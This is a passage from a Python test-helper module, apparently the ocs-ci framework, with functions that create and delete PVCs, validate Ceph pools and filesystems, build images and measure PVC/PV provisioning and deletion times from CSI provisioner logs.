do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["name"] = (
pvc_name if pvc_name else create_unique_resource_name("test", "pvc")
)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if volume_mode:
pvc_data["spec"]["volumeMode"] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
def create_multiple_pvcs(
sc_name,
namespace,
number_of_pvc=1,
size=None,
do_reload=False,
access_mode=constants.ACCESS_MODE_RWO,
burst=False,
):
"""
Create one or more PVC as a bulk or one by one
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True for wait for reloading PVC after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
burst (bool): True for bulk creation, False ( default) for multiple creation
Returns:
ocs_objs (list): List of PVC objects
tmpdir (str): The full path of the directory in which the yamls for pvc objects creation reside
"""
if not burst:
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
volume_mode = "Block"
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name,
size=size,
namespace=namespace,
do_reload=do_reload,
access_mode=access_mode,
volume_mode=volume_mode,
)
for _ in range(number_of_pvc)
], None
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
pvc_data["spec"]["volumeMode"] = "Block"
else:
pvc_data["spec"]["volumeMode"] = None
# Creating tem directory to hold the files for the PVC creation
tmpdir = tempfile.mkdtemp()
logger.info("Creating the PVC yaml files for creation in bulk")
ocs_objs = []
for _ in range(number_of_pvc):
name = create_unique_resource_name("test", "pvc")
logger.info(f"Adding PVC with name {name}")
pvc_data["metadata"]["name"] = name
templating.dump_data_to_temp_yaml(pvc_data, f"{tmpdir}/{name}.yaml")
ocs_objs.append(pvc.PVC(**pvc_data))
logger.info("Creating all PVCs as bulk")
oc = OCP(kind="pod", namespace=namespace)
cmd = f"create -f {tmpdir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
# Letting the system 1 sec for each PVC to create.
# this will prevent any other command from running in the system in this
# period of time.
logger.info(
f"Going to sleep for {number_of_pvc} sec. "
"until starting verify that PVCs was created."
)
time.sleep(number_of_pvc)
return ocs_objs, tmpdir
def delete_bulk_pvcs(pvc_yaml_dir, pv_names_list, namespace):
"""
Deletes all the pvcs created from yaml file in a provided dir
Args:
pvc_yaml_dir (str): Directory in which yaml file resides
pv_names_list (str): List of pv objects to be deleted
"""
oc = OCP(kind="pod", namespace=namespace)
cmd = f"delete -f {pvc_yaml_dir}/"
oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
time.sleep(len(pv_names_list) / 2)
for pv_name in pv_names_list:
validate_pv_delete(pv_name)
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exist
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph osd lspools"):
logger.info(f"POOLS are {pools}")
for pool in pools:
if pool_name in pool.get("poolname"):
return True
except TimeoutExpiredError:
return False
def get_pool_cr(pool_name):
"""
Get the pool CR even if the kind is unknown.
Args:
pool_name (str): The name of the pool to get the CR for.
Returns:
dict: If the resource is found, None otherwise.
"""
logger.info(f"Checking if pool {pool_name} is kind of {constants.CEPHBLOCKPOOL}")
ocp_kind_cephblockpool = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=config.ENV_DATA["cluster_namespace"]
)
pool_cr = ocp_kind_cephblockpool.get(resource_name=pool_name, dont_raise=True)
if pool_cr is not None:
return pool_cr
else:
logger.info(
f"Pool {pool_name} is not kind={constants.CEPHBLOCKPOOL}"
f", checkging if it is kind={constants.CEPHFILESYSTEM}"
)
ocp_kind_cephfilesystem = ocp.OCP(
kind="CephFilesystem",
namespace=config.ENV_DATA["cluster_namespace"],
)
pool_cr = ocp_kind_cephfilesystem.get(resource_name=pool_name, dont_raise=True)
return pool_cr
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph auth get-key client.admin")
return out["key"]
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd("ceph fs ls")
return out[0]["data_pools"][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if CephFileSystem is created at Ceph and OCP side else
will return False with valid msg i.e Failure cause
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get("metadata").get("name"):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info("Filesystem %s was not create at Openshift Side", fs_name)
return False
try:
for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph fs ls"):
for out in pools:
result = out.get("name")
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return True if (ceph_validate and ocp_validate) else False
def create_ocs_object_from_kind_and_name(
kind, resource_name, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
):
"""
Create OCS object from kind and name
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
namespace (str) the namespace of the resource.
Returns:
ocs_ci.ocs.resources.ocs.OCS (obj): returns OCS object from kind and name.
"""
ocp_object = OCP(kind=kind, resource_name=resource_name, namespace=namespace).get()
return OCS(**ocp_object)
def remove_ocs_object_from_list(kind, resource_name, object_list):
"""
Given a list of OCS objects, the function removes the object with kind and resource from the list
Args:
kind (str): resource kind like CephBlockPool, pvc.
resource_name (str): name of the resource.
object_list (array): Array of OCS objects.
Returns:
(array): Array of OCS objects without removed object.
"""
for obj in object_list:
if obj.name == resource_name and obj.kind == kind:
object_list.remove(obj)
return object_list
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result["items"]
storageclass = [
item.get("metadata").get("name")
for item in sample
if (
(item.get("metadata").get("name") not in constants.IGNORE_SC_GP2)
and (item.get("metadata").get("name") not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""" "
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result["items"]
pool_list = [item.get("metadata").get("name") for item in sample]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrive CephFS name
Returns:
str: Name of CFS
"""
ct_pod = pod.get_ceph_tools_pod()
result = ct_pod.exec_ceph_cmd("ceph fs ls")
return result[0]["name"]
def pull_images(image_name):
"""
Function to pull images on all nodes
Args:
image_name (str): Name of the container image to be pulled
Returns: None
"""
node_objs = node.get_node_objs(node.get_worker_nodes())
for node_obj in node_objs:
logger.info(f'pulling image "{image_name} " on node {node_obj.name}')
assert node_obj.ocp.exec_oc_debug_cmd(
node_obj.name, cmd_list=[f"podman pull {image_name}"]
)
def run_io_with_rados_bench(**kw):
"""
A task for radosbench. Runs radosbench command on specified pod . If
parameters are not provided task assumes few default parameters.This task
runs command in synchronous fashion.
Args:
kw (dict): a dictionary of various radosbench parameters.
ex::
pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get("ceph_pods") # list of pod objects of ceph cluster
config = kw.get("config")
role = config.get("role", "client")
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get("idx", 0)
client = clients[idx]
op = config.get("op", "write")
cleanup = ["--no-cleanup", "--cleanup"][config.get("cleanup", True)]
pool = config.get("pool")
block = str(config.get("size", 4 << 20))
time = config.get("time", 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): pv from pvc to validates
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(
pvc_objs, pod_factory, interface, pods_for_rwx=1, status="", nodes=None
):
"""
Create pods
Args:
pvc_objs (list): List of ocs_ci.ocs.resources.pvc.PVC instances
pod_factory (function): pod_factory function
interface (int): Interface type
pods_for_rwx (int): Number of pods to be created if access mode of
PVC is RWX
status (str): If provided, wait for desired state of each pod before
creating next one
nodes (list): Node name for each pod will be selected from this list.
Returns:
list: list of Pod objects
"""
pod_objs = []
nodes_iter = cycle(nodes) if nodes else None
for pvc_obj in pvc_objs:
volume_mode = getattr(
pvc_obj, "volume_mode", pvc_obj.get()["spec"]["volumeMode"]
)
access_mode = getattr(pvc_obj, "access_mode", pvc_obj.get_pvc_access_mode)
if volume_mode == "Block":
pod_dict = constants.CSI_RBD_RAW_BLOCK_POD_YAML
raw_block_pv = True
else:
raw_block_pv = False
pod_dict = ""
if access_mode == constants.ACCESS_MODE_RWX:
pod_obj_rwx = [
pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
for _ in range(1, pods_for_rwx)
]
pod_objs.extend(pod_obj_rwx)
pod_obj = pod_factory(
interface=interface,
pvc=pvc_obj,
status=status,
node_name=next(nodes_iter) if nodes_iter else None,
pod_dict_path=pod_dict,
raw_block_pv=raw_block_pv,
)
pod_objs.append(pod_obj)
return pod_objs
def create_build_from_docker_image(
image_name,
install_package,
namespace,
source_image="quay.io/ocsci/fedora",
source_image_label="latest",
):
"""
Allows to create a build config using a Dockerfile specified as an
argument, eg.::
$ oc new-build -D $'FROM centos:7\\nRUN yum install -y httpd'
creates a build with ``httpd`` installed.
Args:
image_name (str): Name of the image to be created
source_image (str): Source image to build docker image from,
defaults to Centos as base image
namespace (str): project where build config should be created
source_image_label (str): Tag to use along with the image name,
defaults to 'latest'
install_package (str): package to install over the base image
Returns:
ocs_ci.ocs.ocp.OCP (obj): The OCP object for the image
Fails on UnavailableBuildException exception if build creation
fails
"""
base_image = source_image + ":" + source_image_label
if config.DEPLOYMENT.get("disconnected"):
base_image = mirror_image(image=base_image)
cmd = f"yum install -y {install_package}"
http_proxy, https_proxy, no_proxy = get_cluster_proxies()
if http_proxy:
cmd = (
f"http_proxy={http_proxy} https_proxy={https_proxy} "
f"no_proxy='{no_proxy}' {cmd}"
)
docker_file = f"FROM {base_image}\n " f" RUN {cmd}\n" f"CMD tail -f /dev/null"
command = f"new-build -D $'{docker_file}' --name={image_name}"
kubeconfig = os.getenv("KUBECONFIG")
oc_cmd = f"oc -n {namespace} "
if kubeconfig:
oc_cmd += f"--kubeconfig {kubeconfig} "
oc_cmd += command
logger.info(f"Running command {oc_cmd}")
result = run(oc_cmd, stdout=PIPE, stderr=PIPE, timeout=15, shell=True)
if result.stderr.decode():
raise UnavailableBuildException(
f"Build creation failed with error: {result.stderr.decode()}"
)
out = result.stdout.decode()
logger.info(out)
if "Success" in out:
# Build becomes ready once build pod goes into Completed state
pod_obj = OCP(kind="Pod", resource_name=image_name)
if pod_obj.wait_for_resource(
condition="Completed",
resource_name=f"{image_name}" + "-1-build",
timeout=300,
sleep=30,
):
logger.info(f"build {image_name} ready")
set_image_lookup(image_name)
logger.info(f"image {image_name} can now be consumed")
image_stream_obj = OCP(kind="ImageStream", resource_name=image_name)
return image_stream_obj
else:
raise UnavailableBuildException("Build creation failed")
def set_image_lookup(image_name):
"""
Function to enable lookup, which allows reference to the image stream tag
in the image field of the object. Example::
$ oc set image-lookup mysql
$ oc run mysql --image=mysql
Args:
image_name (str): Name of the image stream to pull
the image locally
Returns:
str: output of set image-lookup command
"""
ocp_obj = ocp.OCP(kind="ImageStream")
command = f"set image-lookup {image_name}"
logger.info(f'image lookup for image"{image_name}" is set')
status = ocp_obj.exec_oc_cmd(command)
return status
def get_provision_time(interface, pvc_name, status="start"):
"""
Get the starting/ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str / list): Name of the PVC(s) for creation time
the list will be list of pvc objects
status (str): the status that we want to get - Start / End
Returns:
datetime object: Time of PVC(s) creation
"""
# Define the status that need to retrieve
operation = "started"
if status.lower() == "end":
operation = "succeeded"
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the time for the one PVC provisioning
if isinstance(pvc_name, str):
stat = [i for i in logs if re.search(f"provision.*{pvc_name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
# Extract the time for the list of PVCs provisioning
if isinstance(pvc_name, list):
all_stats = []
for i in range(0, len(pvc_name)):
name = pvc_name[i].name
stat = [i for i in logs if re.search(f"provision.*{name}.*{operation}", i)]
mon_day = " ".join(stat[0].split(" ")[0:2])
stat = f"{this_year} {mon_day}"
all_stats.append(stat)
all_stats = sorted(all_stats)
if status.lower() == "end":
stat = all_stats[-1] # return the highest time
elif status.lower() == "start":
stat = all_stats[0] # return the lowest time
return datetime.datetime.strptime(stat, DATE_TIME_FORMAT)
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
# End provisioning string may appear in logs several times, take here the latest one
mon_day = " ".join(end[-1].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
def measure_pvc_creation_time_bulk(interface, pvc_name_list, wait_time=60):
"""
Measure PVC creation time of bulk PVC based on logs.
Args:
interface (str): The interface backed the PVC
pvc_name_list (list): List of PVC Names for measuring creation time
wait_time (int): Seconds to wait before collecting CSI log
Returns:
pvc_dict (dict): Dictionary of pvc_name with creation time.
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for name in pvc_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f"provision.*{name}.*started", i)]
end = [i for i in logs if re.search(f"provision.*{name}.*succeeded", i)]
if not start or not end:
no_data_list.append(name)
if no_data_list:
# Clear and get CSI logs after 60secs
logger.info(f"PVC count without CSI create log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logger.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pvc creation data in CSI logs for {no_data_list}"
)
continue
else:
break
pvc_dict = dict()
this_year = str(datetime.datetime.now().year)
for pvc_name in pvc_name_list:
# Extract the starting time for the PVC provisioning
start = [i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start, DATE_TIME_FORMAT)
# Extract the end time for the PVC provisioning
end = [i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end, DATE_TIME_FORMAT)
total = end_time - start_time
pvc_dict[pvc_name] = total.total_seconds()
return pvc_dict
def measure_pv_deletion_time_bulk(
interface, pv_name_list, wait_time=60, return_log_times=False
):
"""
Measure PV deletion time of bulk PV, based on logs.
Args:
interface (str): The interface backed the PV
pv_name_list (list): List of PV Names for measuring deletion time
wait_time (int): Seconds to wait before collecting CSI log
return_log_times (bool): Determines the return value -- if False, dictionary of pv_names with the deletion time
is returned; if True -- the dictionary of pv_names with the tuple of (srart_deletion_time,
end_deletion_time) is returned
Returns:
pv_dict (dict): Dictionary where the pv_names are the keys. The value of the dictionary depend on the
return_log_times argument value and are either the corresponding deletion times (when return_log_times
is False) or a tuple of (start_deletion_time, end_deletion_time) as they appear in the logs
"""
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# due to some delay in CSI log generation added wait
time.sleep(wait_time)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter = 0
while True:
no_data_list = list()
for pv in pv_name_list:
# check if PV data present in CSI logs
start = [i for i in logs if re.search(f'delete "{pv}": started', i)]
end = [i for i in logs if re.search(f'delete "{pv}": succeeded', i)]
if not start or not end:
no_data_list.append(pv)
if no_data_list:
# Clear and get CSI logs after 60secs
logger.info(f"PV count without CSI delete log data {len(no_data_list)}")
logs.clear()
time.sleep(wait_time)
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
loop_counter += 1
if loop_counter >= 6:
logger.info("Waited for more than 6mins still no data")
raise UnexpectedBehaviour(
f"There is no pv deletion data in CSI logs for {no_data_list}"
)
continue
else:
break
pv_dict = dict()
this_year = str(datetime.datetime.now().year)
for pv_name in pv_name_list:
# Extract the deletion start time for the PV
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start_tm = f"{this_year} {mon_day}"
start_time = datetime.datetime.strptime(start_tm, DATE_TIME_FORMAT)
# Extract the deletion end time for the PV
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end_tm = f"{this_year} {mon_day}"
end_time = datetime.datetime.strptime(end_tm, DATE_TIME_FORMAT)
total = end_time - start_time
if not return_log_times:
pv_dict[pv_name] = total.total_seconds()
else:
pv_dict[pv_name] = (start_tm, end_tm)
return pv_dict
def get_start_deletion_time(interface, pv_name):
"""
Get the starting deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: Start time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PVC deletion
start = [i for i in logs if re.search(f'delete "{pv_name}": started', i)]
mon_day = " ".join(start[0].split(" ")[0:2])
start = f"{this_year} {mon_day}"
return datetime.datetime.strptime(start, DATE_TIME_FORMAT)
def get_end_deletion_time(interface, pv_name):
"""
Get the ending deletion time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PVC for deletion time measurement
Returns:
datetime object: End time of PVC deletion
"""
this_year = str(datetime.datetime.now().year)
# Get the correct provisioner pod based on the interface
pod_name = pod.get_csi_provisioner_pod(interface)
# get the logs from the csi-provisioner containers
logs = pod.get_pod_logs(pod_name[0], "csi-provisioner")
logs += pod.get_pod_logs(pod_name[1], "csi-provisioner")
logs = logs.split("\n")
# Extract the starting time for the PV deletion
end = [i for i in logs if re.search(f'delete "{pv_name}": succeeded', i)]
mon_day = " ".join(end[0].split(" ")[0:2])
end = f"{this_year} {mon_day}"
return datetime.datetime.strptime(end, DATE_TIME_FORMAT)
def measure_pvc_deletion_time(interface, pv_name):
"""
Measure PVC deletion time based on logs
Args:
interface (str): The interface backed the PVC
pv_name (str): Name of the PV for creation time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = "%Y-%m-%dT%H:%M:%SZ"
containers_start_time = {}
start_time = pod_obj.data["status"]["startTime"]
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data["status"]["containerStatuses"])):
started_time = pod_obj.data["status"]["containerStatuses"][container]["state"][
"running"
]["startedAt"]
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data["status"]["containerStatuses"][container]["name"]
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind="StorageClass")
storage_classes = default_sc_obj.get().get("items")
storage_classes = [
sc for sc in storage_classes if "annotations" in sc.get("metadata")
]
return [
sc.get("metadata").get("name")
for sc in storage_classes
if sc.get("metadata")
.get("annotations")
.get("storageclass.kubernetes.io/is-default-class")
== "true"
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind="StorageClass")
if default_sc:
# Change the existing default Storageclass annotation to false
for sc in default_sc:
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"false"}}}\' '
)
patch_cmd = f"patch storageclass {sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"true"}}}\' '
)
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
"""
Check whether Image/Subvolume is present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is present and False if volume is not present
"""
cmd = ""
valid_error = []
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = [f"error opening image csi-vol-{image_uuid}"]
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = [
f"Subvolume 'csi-vol-{image_uuid}' not found",
f"subvolume 'csi-vol-{image_uuid}' does not exist",
]
cmd = (
f"ceph fs subvolume getpath {get_cephfs_name()}"
f" csi-vol-{image_uuid} {get_cephfs_subvolumegroup()}"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format="json")
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} exists " f"in backend"
)
return True
except CommandFailed as ecf:
assert any([error in str(ecf) for error in valid_error]), (
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Volume corresponding to uuid {image_uuid} does not exist " f"in backend"
)
return False
def verify_volume_deleted_in_backend(
interface, image_uuid, pool_name=None, timeout=180
):
"""
Ensure that Image/Subvolume is deleted in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
timeout (int): Wait time for the volume to be deleted.
Returns:
bool: True if volume is deleted before timeout.
False if volume is not deleted.
"""
try:
for ret in TimeoutSampler(
timeout,
2,
is_volume_present_in_backend,
interface=interface,
image_uuid=image_uuid,
pool_name=pool_name,
):
if not ret:
break
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
except TimeoutExpiredError:
logger.error(
f"Volume corresponding to uuid {image_uuid} is not deleted " f"in backend"
)
# Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd("ceph progress json", format=None)
ct_pod.exec_ceph_cmd("ceph rbd task list")
return False
def delete_volume_in_backend(img_uuid, pool_name=None):
"""
Delete an Image/Subvolume in the backend
Args:
img_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
